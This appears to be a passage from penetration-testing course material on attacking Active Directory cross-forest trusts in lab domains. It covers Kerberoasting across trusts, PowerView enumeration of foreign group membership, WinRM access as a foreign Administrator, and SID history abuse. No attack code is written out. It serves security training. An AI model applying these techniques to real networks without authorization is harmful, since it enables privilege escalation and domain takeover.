Note: Kerberos attacks such as Kerberoasting and ASREPRoasting can be performed across trusts, depending on the trust direction. It is possible because authentication is still enabled cross-forest.
We can utilize PowerView to enumerate accounts in a target domain that have SPNs associated with them.
Sometimes we'll run into situations where admin users in one domain are also admin users in another domain. So it is worth checking for password re-use between domains.
We may also see members of one domain are also members of another domain. Only Domain Local Groups allow security principals from outside its forest. We can use the PowerView function Get-DomainForeignGroupMember to enumerate groups with users that do not belong to the domain, also known as foreign group membership.
Here for example we see that the built-in Administrators group in FREIGHTLOGISTICS.LOCAL has the built-in Administrator account for the INLANEFREIGHT.LOCAL domain as a member.
We can verify this access using the Enter-PSSession cmdlet to connect over WinRM.
With that we will successfully authenticate to the Domain Controller in the FREIGHTLOGISTICS.LOCAL domain using the Administrator account from the INLANEFREIGHT.LOCAL domain across the bidirectional forest trust. This can be a quick win after taking control of a domain and is always worth checking for if a bidirectional forest trust situation is present during an assessment and the second forest is in-scope.
SID History Abuse
If the SID of an account with administrative privileges in Forest A is added to the SID history attribute of an account in Forest B, assuming they can authenticate across the forest, then this account will have administrative privileges when accessing resources in the partner forest.
